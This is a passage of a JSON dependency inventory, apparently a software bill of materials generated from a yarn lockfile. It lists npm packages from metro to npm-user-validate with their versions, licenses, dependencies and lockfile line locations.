[ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7422, "EndLine": 7425 } ], "AnalyzedBy": "yarn" }, { "ID": "metro@0.83.3", "Name": "metro", "Identifier": { "PURL": "pkg:npm/metro@0.83.3", "UID": "6895e7cb0899a622" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "@babel/types@7.28.4", "accepts@1.3.8", "chalk@4.1.2", "ci-info@2.0.0", "connect@3.7.0", "debug@4.4.3", "error-stack-parser@2.1.4", "flow-enums-runtime@0.0.6", "graceful-fs@4.2.11", "hermes-parser@0.32.0", "image-size@1.2.1", "invariant@2.2.4", "jest-worker@29.7.0", "jsc-safe-url@0.2.4", "lodash.throttle@4.1.1", "metro-babel-transformer@0.83.3", "metro-cache@0.83.3", "metro-cache-key@0.83.3", "metro-config@0.83.3", "metro-core@0.83.3", "metro-file-map@0.83.3", "metro-resolver@0.83.3", "metro-runtime@0.83.3", "metro-source-map@0.83.3", "metro-symbolicate@0.83.3", "metro-transform-plugins@0.83.3", "metro-transform-worker@0.83.3", "mime-types@2.1.35", "nullthrows@1.1.1", "serialize-error@2.1.0", "source-map@0.5.7", "throat@5.0.0", "ws@7.5.10", "yargs@17.7.2" ], "Locations": [ { "StartLine": 7574, "EndLine": 7618 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-babel-transformer@0.83.3", "Name": "metro-babel-transformer", "Identifier": { "PURL": "pkg:npm/metro-babel-transformer@0.83.3", "UID": "8b62b2cde3a1543d" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "flow-enums-runtime@0.0.6", "hermes-parser@0.32.0", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 7427, "EndLine": 7435 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-cache@0.83.3", "Name": "metro-cache", "Identifier": { "PURL": "pkg:npm/metro-cache@0.83.3", "UID": "4fd615f72d97e163" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "exponential-backoff@3.1.2", "flow-enums-runtime@0.0.6", "https-proxy-agent@7.0.6", "metro-core@0.83.3" ], "Locations": [ { "StartLine": 7444, "EndLine": 7452 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-cache-key@0.83.3", "Name": "metro-cache-key", "Identifier": { "PURL": "pkg:npm/metro-cache-key@0.83.3", "UID": "3895e127c41494dc" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 7437, "EndLine": 7442 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-config@0.83.3", "Name": "metro-config", "Identifier": { "PURL": "pkg:npm/metro-config@0.83.3", "UID": "3655210f3a2848a4" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "connect@3.7.0", "flow-enums-runtime@0.0.6", "jest-validate@29.7.0", "metro@0.83.3", "metro-cache@0.83.3", "metro-core@0.83.3", "metro-runtime@0.83.3", "yaml@2.8.1" ], "Locations": [ { "StartLine": 7454, "EndLine": 7466 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-core@0.83.3", "Name": "metro-core", "Identifier": { "PURL": "pkg:npm/metro-core@0.83.3", "UID": "9452004724b9a1e2" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "lodash.throttle@4.1.1", "metro-resolver@0.83.3" ], "Locations": [ { "StartLine": 7468, "EndLine": 7475 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-file-map@0.83.3", "Name": "metro-file-map", "Identifier": { "PURL": "pkg:npm/metro-file-map@0.83.3", "UID": "ad58ef8981471bf" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3", "fb-watchman@2.0.2", "flow-enums-runtime@0.0.6", "graceful-fs@4.2.11", "invariant@2.2.4", "jest-worker@29.7.0", "micromatch@4.0.8", "nullthrows@1.1.1", "walker@1.0.8" ], "Locations": [ { "StartLine": 7477, "EndLine": 7490 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-minify-terser@0.83.3", "Name": "metro-minify-terser", "Identifier": { "PURL": "pkg:npm/metro-minify-terser@0.83.3", "UID": "c8f2c547c8794747" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "terser@5.44.0" ], "Locations": [ { "StartLine": 7492, "EndLine": 7498 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-resolver@0.83.3", "Name": "metro-resolver", "Identifier": { "PURL": "pkg:npm/metro-resolver@0.83.3", "UID": "7afde93a4af8c50" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 7500, "EndLine": 7505 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-runtime@0.83.3", "Name": "metro-runtime", "Identifier": { "PURL": "pkg:npm/metro-runtime@0.83.3", "UID": "f2766d21c278a8f8" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.28.4", "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 7507, "EndLine": 7513 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-source-map@0.83.3", "Name": "metro-source-map", "Identifier": { "PURL": "pkg:npm/metro-source-map@0.83.3", "UID": "541fec97ee217bc3" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/traverse--for-generate-function-map@7.28.4", "@babel/types@7.28.4", "flow-enums-runtime@0.0.6", "invariant@2.2.4", "metro-symbolicate@0.83.3", "nullthrows@1.1.1", "ob1@0.83.3", "source-map@0.5.7", "vlq@1.0.1" ], "Locations": [ { "StartLine": 7515, "EndLine": 7529 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-symbolicate@0.83.3", "Name": "metro-symbolicate", "Identifier": { "PURL": "pkg:npm/metro-symbolicate@0.83.3", "UID": "14680860defe8ef6" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "invariant@2.2.4", "metro-source-map@0.83.3", "nullthrows@1.1.1", "source-map@0.5.7", "vlq@1.0.1" ], "Locations": [ { "StartLine": 7531, "EndLine": 7541 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-transform-plugins@0.83.3", "Name": "metro-transform-plugins", "Identifier": { "PURL": "pkg:npm/metro-transform-plugins@0.83.3", "UID": "62f3c2ac5aac5552" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "flow-enums-runtime@0.0.6", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 7543, "EndLine": 7553 } ], "AnalyzedBy": "yarn" }, { "ID": "metro-transform-worker@0.83.3", "Name": "metro-transform-worker", "Identifier": { "PURL": "pkg:npm/metro-transform-worker@0.83.3", "UID": "9c7e6d92961709a7" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/parser@7.28.4", "@babel/types@7.28.4", "flow-enums-runtime@0.0.6", "metro@0.83.3", "metro-babel-transformer@0.83.3", "metro-cache@0.83.3", "metro-cache-key@0.83.3", "metro-minify-terser@0.83.3", "metro-source-map@0.83.3", "metro-transform-plugins@0.83.3", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 7555, "EndLine": 7572 } ], "AnalyzedBy": "yarn" }, { "ID": "micromatch@4.0.8", "Name": "micromatch", "Identifier": { "PURL": "pkg:npm/micromatch@4.0.8", "UID": "82369eb774894958" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "braces@3.0.3", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 7620, "EndLine": 7626 } ], "AnalyzedBy": "yarn" }, { "ID": "mime@1.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@1.6.0", "UID": "9532ee92ff6a1e4c" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7650, "EndLine": 7653 } ], "AnalyzedBy": "yarn" }, { "ID": "mime@2.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@2.6.0", "UID": "20be5c1babee3e50" }, "Version": "2.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7640, "EndLine": 7643 } ], "AnalyzedBy": "yarn" }, { "ID": "mime-db@1.52.0", "Name": "mime-db", "Identifier": { "PURL": "pkg:npm/mime-db@1.52.0", "UID": "c3ab07608fb8ffaf" }, "Version": "1.52.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7628, "EndLine": 7631 } ], "AnalyzedBy": "yarn" }, { "ID": "mime-types@2.1.35", "Name": "mime-types", "Identifier": { "PURL": "pkg:npm/mime-types@2.1.35", "UID": "75c1063c6b0675b" }, "Version": "2.1.35", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-db@1.52.0" ], "Locations": [ { "StartLine": 7633, "EndLine": 7638 } ], "AnalyzedBy": "yarn" }, { "ID": "mimic-fn@2.1.0", "Name": "mimic-fn", "Identifier": { "PURL": "pkg:npm/mimic-fn@2.1.0", "UID": "63e00c1467aa8327" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7655, "EndLine": 7658 } ], "AnalyzedBy": "yarn" }, { "ID": "mimic-response@3.1.0", "Name": "mimic-response", "Identifier": { "PURL": "pkg:npm/mimic-response@3.1.0", "UID": "36679babef2f2833" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7660, "EndLine": 7663 } ], "AnalyzedBy": "yarn" }, { "ID": "min-indent@1.0.1", "Name": "min-indent", "Identifier": { "PURL": "pkg:npm/min-indent@1.0.1", "UID": "58f800266015a753" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7665, "EndLine": 7668 } ], "AnalyzedBy": "yarn" }, { "ID": "minimatch@10.0.3", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "85f0f94cea6a1bce" }, "Version": "10.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/brace-expansion@5.0.0" ], "Locations": [ { "StartLine": 7670, "EndLine": 7673 } ], "AnalyzedBy": "yarn" }, { "ID": "minimatch@3.1.2", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "2583e427b34671fe" }, "Version": "3.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@1.1.12" ], "Locations": [ { "StartLine": 7696, "EndLine": 7701 } ], "AnalyzedBy": "yarn" }, { "ID": "minimatch@8.0.7", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@8.0.7", "UID": "33bea0b90add351f" }, "Version": "8.0.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.0.2" ], "Locations": [ { "StartLine": 7703, "EndLine": 7708 } ], "AnalyzedBy": "yarn" }, { "ID": "minimatch@9.0.5", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "7218c46a058dde84" }, "Version": "9.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.0.2" ], "Locations": [ { "StartLine": 7717, "EndLine": 7720 } ], "AnalyzedBy": "yarn" }, { "ID": "minimist@1.2.8", "Name": "minimist", "Identifier": { "PURL": "pkg:npm/minimist@1.2.8", "UID": "3734e60c4896596" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7731, "EndLine": 7734 } ], "AnalyzedBy": "yarn" }, { "ID": "minimist-options@4.1.0", "Name": "minimist-options", "Identifier": { "PURL": "pkg:npm/minimist-options@4.1.0", "UID": "8b55f8d2f7ad8f74" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "arrify@1.0.1", "is-plain-obj@1.1.0", "kind-of@6.0.3" ], "Locations": [ { "StartLine": 7722, "EndLine": 7729 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass@3.3.6", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@3.3.6", "UID": "4bb011cdcd78163b" }, "Version": "3.3.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 7812, "EndLine": 7817 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass@4.2.8", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@4.2.8", "UID": "97775e5a3d74b7c2" }, "Version": "4.2.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7819, "EndLine": 7822 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass@7.1.2", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@7.1.2", "UID": "3afe664c1ca5f2b7" }, "Version": "7.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7824, "EndLine": 7827 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-collect@2.0.1", "Name": "minipass-collect", "Identifier": { "PURL": "pkg:npm/minipass-collect@2.0.1", "UID": "6a4db0c2755ebe58" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 7743, "EndLine": 7748 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-fetch@4.0.1", "Name": "minipass-fetch", "Identifier": { "PURL": "pkg:npm/minipass-fetch@4.0.1", "UID": "ccc45a302dd0cfc2" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2", "minipass-sized@1.0.3", "minizlib@3.1.0" ], "Locations": [ { "StartLine": 7761, "EndLine": 7768 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-flush@1.0.5", "Name": "minipass-flush", "Identifier": { "PURL": "pkg:npm/minipass-flush@1.0.5", "UID": "791b5dbb716669ff" }, "Version": "1.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 7770, "EndLine": 7775 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-pipeline@1.2.4", "Name": "minipass-pipeline", "Identifier": { "PURL": "pkg:npm/minipass-pipeline@1.2.4", "UID": "a8a6d4a0d72db3d3" }, "Version": "1.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 7777, "EndLine": 7782 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-sized@1.0.3", "Name": "minipass-sized", "Identifier": { "PURL": "pkg:npm/minipass-sized@1.0.3", "UID": "18bdd5240b606403" }, "Version": "1.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 7784, "EndLine": 7789 } ], "AnalyzedBy": "yarn" }, { "ID": "minizlib@3.1.0", "Name": "minizlib", "Identifier": { "PURL": "pkg:npm/minizlib@3.1.0", "UID": "f511aa6a4d4696e8" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 7842, "EndLine": 7847 } ], "AnalyzedBy": "yarn" }, { "ID": "mkdirp@1.0.4", "Name": "mkdirp", "Identifier": { "PURL": "pkg:npm/mkdirp@1.0.4", "UID": "7c207081f40d7be5" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7854, "EndLine": 7857 } ], "AnalyzedBy": "yarn" }, { "ID": "mkdirp-classic@0.5.3", "Name": "mkdirp-classic", "Identifier": { "PURL": "pkg:npm/mkdirp-classic@0.5.3", "UID": "a9b9d00ff8d8ec51" }, "Version": "0.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7849, "EndLine": 7852 } ], "AnalyzedBy": "yarn" }, { "ID": "ms@2.0.0", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.0.0", "UID": "d40bb30469804a" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7869, "EndLine": 7872 } ], "AnalyzedBy": "yarn" }, { "ID": "ms@2.1.3", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.1.3", "UID": "19c0ded94545f8a2" }, "Version": "2.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7864, "EndLine": 7867 } ], "AnalyzedBy": "yarn" }, { "ID": "mute-stream@2.0.0", "Name": "mute-stream", "Identifier": { "PURL": "pkg:npm/mute-stream@2.0.0", "UID": "c2feec0593cfbeeb" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7874, "EndLine": 7875 } ], "AnalyzedBy": "yarn" }, { "ID": "nanoid@3.3.11", "Name": "nanoid", "Identifier": { "PURL": "pkg:npm/nanoid@3.3.11", "UID": "e73947d96bf98f3d" }, "Version": "3.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7877, "EndLine": 7880 } ], "AnalyzedBy": "yarn" }, { "ID": "napi-build-utils@2.0.0", "Name": "napi-build-utils", "Identifier": { "PURL": "pkg:npm/napi-build-utils@2.0.0", "UID": "10e1ffc8e9fff7b9" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7882, "EndLine": 7885 } ], "AnalyzedBy": "yarn" }, { "ID": "negotiator@0.6.3", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@0.6.3", "UID": "968d435eebf24a8d" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7902, "EndLine": 7905 } ], "AnalyzedBy": "yarn" }, { "ID": "negotiator@1.0.0", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@1.0.0", "UID": "682c027add6db8c8" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7897, "EndLine": 7900 } ], "AnalyzedBy": "yarn" }, { "ID": "no-case@3.0.4", "Name": "no-case", "Identifier": { "PURL": "pkg:npm/no-case@3.0.4", "UID": "43554e2272b44359" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lower-case@2.0.2", "tslib@2.8.1" ], "Locations": [ { "StartLine": 7907, "EndLine": 7913 } ], "AnalyzedBy": "yarn" }, { "ID": "node-abi@3.78.0", "Name": "node-abi", "Identifier": { "PURL": "pkg:npm/node-abi@3.78.0", "UID": "ecb3c598f134c095" }, "Version": "3.78.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 7920, "EndLine": 7925 } ], "AnalyzedBy": "yarn" }, { "ID": "node-addon-api@6.1.0", "Name": "node-addon-api", "Identifier": { "PURL": "pkg:npm/node-addon-api@6.1.0", "UID": "a2a25e465252ea99" }, "Version": "6.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7927, "EndLine": 7930 } ], "AnalyzedBy": "yarn" }, { "ID": "node-fetch@1.7.3", "Name": "node-fetch", "Identifier": { "PURL": "pkg:npm/node-fetch@1.7.3", "UID": "6acbb9f806f1d654" }, "Version": "1.7.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encoding@0.1.13", "is-stream@1.1.0" ], "Locations": [ { "StartLine": 7937, "EndLine": 7943 } ], "AnalyzedBy": "yarn" }, { "ID": "node-gyp@11.4.2", "Name": "node-gyp", "Identifier": { "PURL": "pkg:npm/node-gyp@11.4.2", "UID": "c7f26321de620208" }, "Version": "11.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "env-paths@2.2.1", "exponential-backoff@3.1.2", "graceful-fs@4.2.11", "make-fetch-happen@14.0.3", "nopt@8.1.0", "proc-log@5.0.0", "semver@7.7.3", "tar@7.5.1", "tinyglobby@0.2.15", "which@5.0.0" ], "Locations": [ { "StartLine": 7945, "EndLine": 7957 } ], "AnalyzedBy": "yarn" }, { "ID": "node-html-parser@7.0.1", "Name": "node-html-parser", "Identifier": { "PURL": "pkg:npm/node-html-parser@7.0.1", "UID": "b02135a33e88ce4e" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-select@5.2.2", "he@1.2.0" ], "Locations": [ { "StartLine": 7975, "EndLine": 7981 } ], "AnalyzedBy": "yarn" }, { "ID": "node-int64@0.4.0", "Name": "node-int64", "Identifier": { "PURL": "pkg:npm/node-int64@0.4.0", "UID": "c2a9bfa3ae4ffa3b" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7983, "EndLine": 7986 } ], "AnalyzedBy": "yarn" }, { "ID": "node-releases@2.0.23", "Name": "node-releases", "Identifier": { "PURL": "pkg:npm/node-releases@2.0.23", "UID": "278eee987e9476fa" }, "Version": "2.0.23", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7988, "EndLine": 7991 } ], "AnalyzedBy": "yarn" }, { "ID": "noop-fn@1.0.0", "Name": "noop-fn", "Identifier": { "PURL": "pkg:npm/noop-fn@1.0.0", "UID": "43401c296c887994" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7998, "EndLine": 8001 } ], "AnalyzedBy": "yarn" }, { "ID": "nopt@8.1.0", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@8.1.0", "UID": "c17c3fdd9805c309" }, "Version": "8.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abbrev@3.0.1" ], "Locations": [ { "StartLine": 8010, "EndLine": 8013 } ], "AnalyzedBy": "yarn" }, { "ID": "normalize-package-data@2.5.0", "Name": "normalize-package-data", "Identifier": { "PURL": "pkg:npm/normalize-package-data@2.5.0", "UID": "4d21e0eecbf40fdf" }, "Version": "2.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@2.8.9", "resolve@1.22.10", "semver@5.7.2", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 8015, "EndLine": 8023 } ], "AnalyzedBy": "yarn" }, { "ID": "normalize-package-data@3.0.3", "Name": "normalize-package-data", "Identifier": { "PURL": "pkg:npm/normalize-package-data@3.0.3", "UID": "13ff78492e989a1b" }, "Version": "3.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@4.1.0", "is-core-module@2.16.1", "semver@7.7.3", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 8025, "EndLine": 8033 } ], "AnalyzedBy": "yarn" }, { "ID": "normalize-path@3.0.0", "Name": "normalize-path", "Identifier": { "PURL": "pkg:npm/normalize-path@3.0.0", "UID": "ceadd7943ac055b0" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8035, "EndLine": 8038 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-audit-report@6.0.0", "Name": "npm-audit-report", "Identifier": { "PURL": "pkg:npm/npm-audit-report@6.0.0", "UID": "c268433d084fcf46" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8040, "EndLine": 8041 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-bundled@4.0.0", "Name": "npm-bundled", "Identifier": { "PURL": "pkg:npm/npm-bundled@4.0.0", "UID": "30d94ba42a6ecff5" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-normalize-package-bin@4.0.0" ], "Locations": [ { "StartLine": 8043, "EndLine": 8046 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-install-checks@7.1.2", "Name": "npm-install-checks", "Identifier": { "PURL": "pkg:npm/npm-install-checks@7.1.2", "UID": "d7d659b6852b60b8" }, "Version": "7.1.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 8048, "EndLine": 8051 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-normalize-package-bin@4.0.0", "Name": "npm-normalize-package-bin", "Identifier": { "PURL": "pkg:npm/npm-normalize-package-bin@4.0.0", "UID": "13becbc7c26a5cee" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8053, "EndLine": 8054 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-package-arg@13.0.1", "Name": "npm-package-arg", "Identifier": { "PURL": "pkg:npm/npm-package-arg@13.0.1", "UID": "faef2892f701f54c" }, "Version": "13.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@9.0.2", "proc-log@5.0.0", "semver@7.7.3", "validate-npm-package-name@6.0.2" ], "Locations": [ { "StartLine": 8056, "EndLine": 8062 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-packlist@10.0.2", "Name": "npm-packlist", "Identifier": { "PURL": "pkg:npm/npm-packlist@10.0.2", "UID": "bd8730f70b27fc09" }, "Version": "10.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ignore-walk@8.0.0", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 8064, "EndLine": 8068 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-pick-manifest@11.0.1", "Name": "npm-pick-manifest", "Identifier": { "PURL": "pkg:npm/npm-pick-manifest@11.0.1", "UID": "eaad1065eb28bca0" }, "Version": "11.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-install-checks@7.1.2", "npm-normalize-package-bin@4.0.0", "npm-package-arg@13.0.1", "semver@7.7.3" ], "Locations": [ { "StartLine": 8070, "EndLine": 8076 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-profile@12.0.0", "Name": "npm-profile", "Identifier": { "PURL": "pkg:npm/npm-profile@12.0.0", "UID": "d621bf2974e1855" }, "Version": "12.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-registry-fetch@19.0.0", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 8078, "EndLine": 8082 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-registry-fetch@19.0.0", "Name": "npm-registry-fetch", "Identifier": { "PURL": "pkg:npm/npm-registry-fetch@19.0.0", "UID": "7baae6d448c7e28b" }, "Version": "19.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/redact@3.2.2", "jsonparse@1.3.1", "make-fetch-happen@15.0.2", "minipass@7.1.2", "minipass-fetch@4.0.1", "minizlib@3.1.0", "npm-package-arg@13.0.1", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 8084, "EndLine": 8094 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-run-path@4.0.1", "Name": "npm-run-path", "Identifier": { "PURL": "pkg:npm/npm-run-path@4.0.1", "UID": "3c4cc97ae9fb78b1" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1" ], "Locations": [ { "StartLine": 8096, "EndLine": 8101 } ], "AnalyzedBy": "yarn" }, { "ID": "npm-user-validate@3.0.0", "Name": "npm-user-validate", "Identifier": { "PURL": "pkg:npm/npm-user-validate@3.0.0", "UID": 